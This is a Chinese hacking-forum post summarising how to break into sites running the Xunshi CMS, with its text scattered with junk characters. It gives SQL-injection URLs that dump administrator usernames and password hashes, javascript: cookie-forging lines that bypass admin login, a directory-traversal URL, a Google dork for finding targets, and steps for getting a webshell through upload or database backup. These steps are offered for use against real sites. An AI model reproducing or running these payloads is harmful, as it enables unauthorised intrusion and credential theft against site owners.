找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2481|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘
5 v2 R1 |" k* \* e! \# y: W. |
: N3 P- T# m# l1 r在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
5 c+ ~! Z; g' d& ]6 n6 s2 p
2 u6 m! _& [# c9 U以下本文总结来自黑防去年第9期杂志上的内容...
9 d1 s8 q" x- `9 X, }$ L5 j) @3 J( ]$ {" w  s9 I6 E
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%8 ~: ]% y2 x- q' R/ R' H
5 P, h2 b" u% J& [  R4 E
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
' d! e% L# {" s8 T3 W. z$ M! w& M8 I. t( Z. X; p( n) f% T
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
( @" N, O% X0 K( o0 |9 O* r这里一个注入
: @* q/ e* D2 `5 ?, v4 q+ _" u& f2 O9 ^
效果如图:
" p1 k6 l7 W7 K: v$ \) _7 u1 `6 M, q2 x# ^& g& Y6 X$ H& n4 b7 R
' q, m. i% f% |: a9 o! T

( P/ K; @# E, r" }4 C5 y- b这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
9 E3 \! ]) v0 q+ c% O5 o2 z1 t% ^3 G1 k' T4 a2 V0 M6 e
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去5 r* b, w! v" A/ e: o7 i
# B! I( {( \: x( D9 f3 r! Z% H
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));0 y+ N7 K8 |/ E4 }' H8 _; ~. s. d
$ x8 F  a  d- e, r7 u
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:* M+ X3 G& r# L9 `5 {1 S

) e' Y5 O9 l. S3 n因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
/ Z/ k; q  N/ @1 y6 p9 z/ P  u7 l6 Z) H1 M6 u
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
- Q* U- N3 D  V7 a# ?$ f% x. l1 g6 l1 Y# |1 Y* |
访问这页面来列目录..步骤如下:
! G" A0 P" @- J
- U& |! u! m  N% [: b, `javascript:alert(document.cookie="admindj=1")
3 R3 F5 X/ z/ J8 L6 t1 C; ?2 }9 |9 Q/ r
http://www.political-security.co ... asp?id=46&dir=../..6 s" H8 \: l2 Q. }: k
% w, q4 L& i+ b$ X
效果如图:. a  ~, r3 v" n( [. @+ |8 ~
' ?$ T) L7 e3 u' g4 k7 A- h# `
; u, f% l# M, E' b

+ O7 ^5 s6 V6 |0 j" V5 O; X) d这样全站目录都能瞧了..找到后台目录..进去..& R5 W/ v: n# A4 U/ @- d

0 E3 R& W+ P" K. L那么进了后台怎么拿shell??上传--备份就ok了..* M9 u! t( i! W+ }: }) p
5 D3 p, N/ O8 F) k" n
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
! q% y# i' c" x7 q1 d
1 m% _  w' Y$ I7 B. u$ m0 C1 a* K  p这个我也碰到过一次..你都可以通过列目录来实现..
. C' j3 B9 s6 W5 C1 V& X0 }2 b" [9 k. `3 r1 B/ e* Q
javascript:alert(document.cookie="admindj=1")
( N6 [8 L- d$ Z8 T# D6 z
* p. |) m4 r. M  y# i# nhttp://www.political-security.co ... p?action=BackupData , ^- q8 d4 z3 `" R* {" {! y

/ N! i5 D9 A$ I, c/ Q+ H! D. x+ E" @  n备份ok..; `5 b3 Z: J6 K* o- G

: G: Y2 T- g9 M9 K1 ]1 U3 m& L那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
( b8 \. r, a. Z, Y1 c/ b. `% }% X5 \/ B) e, ^) Q
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
, Y' H9 h9 m8 s) |# A+ \* D. |4 O5 E' }/ [# Z: Q
然后访问此页面进行注入..步骤如下:
+ _* q# L0 p( j0 C9 a: w+ H3 D* e9 ?" i* {
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
7 F. h* F3 T. E8 v9 w  S$ W* t( n, k( W: \, k( u- W7 T' g) O
然后请求admin/admin_chk.asp页面' Y- n0 `; _: b& h+ T9 l

( z% ~/ y- A5 b3 K" z! |4 n输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%* s7 D  a4 G! y$ r

6 X! _( @) O1 q$ Z+ `26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin# w8 l! G0 P/ t2 `, _7 l

/ H5 A' `/ d; R( l' v  s- G- M效果如图所示:
4 z  O2 X9 G: o  l$ b' Z# T" n
' j, y" S( x% q- C : V0 s7 d; |) a/ ~1 L8 O  Z

. `  F1 n* l- g+ p讯时漏洞2) z7 |- M8 B% `' i
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)' x) i6 v2 k5 I( I: i& }
! `* p- I& U& b5 w# J0 A6 B- o3 M0 R
1、/admin/admin_news_pl_view.asp?id=18 e  d+ g5 |2 S& T
//id任意 填入以下语句
0 i$ E5 S1 F; z- G
7 V  A0 T0 z- k9 i2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!! I% k6 \+ S/ l4 x! U

1 \9 c' t: S/ M5 X1 I- ~8 ]( j- h. [9 v& q; d5 y" F0 h

2 T2 s& u' w+ {+ G% t/ a: b3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='( t  Y# t2 Z4 X  N
' o9 Q; E4 M2 F2 u6 e

# x, I# W+ e5 q
( o1 H$ _0 E& |8 u( e) N! @1 ~爆出管理员帐号和密码了! N: M% c* \+ F

, ?( R8 T9 L" `- n. q' R
" v0 ~1 ~' Y( S: ?) Y. ]
9 @5 m5 ?; E% o! {4、cookies进后台% K- u2 ~; h  T% |

' |7 q" ~  t0 `# a. ^javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
: {. O! g2 v* Z3 I$ y' ~! Q8 v
2 Y- P- b! c; c8 J+ @
* O/ N" C+ H, _6 X6 {3 }
4 j' [3 X. I: U' k5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
9 F! h- m9 s$ k& x3 b0 `) }
  ^, ?* @9 l' z+ Z
* P6 ]' C0 R/ Y& `) j: o. X1 \- r5 m# T
6、后台有上传和备份取SHELL不难。
$ i2 f& X' F( S6 [/ ]  ?% P
% i& q. S" X4 T  d7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..$ O) s  x2 T2 O+ R+ ]5 ]
" t+ h+ u3 l" F7 n3 r
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!) h. g- w$ l! i- A8 J
; v6 e  e: j6 [4 a( \7 O- m

, B' {; z( W: R' Q  @1 G8 x: i) A
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表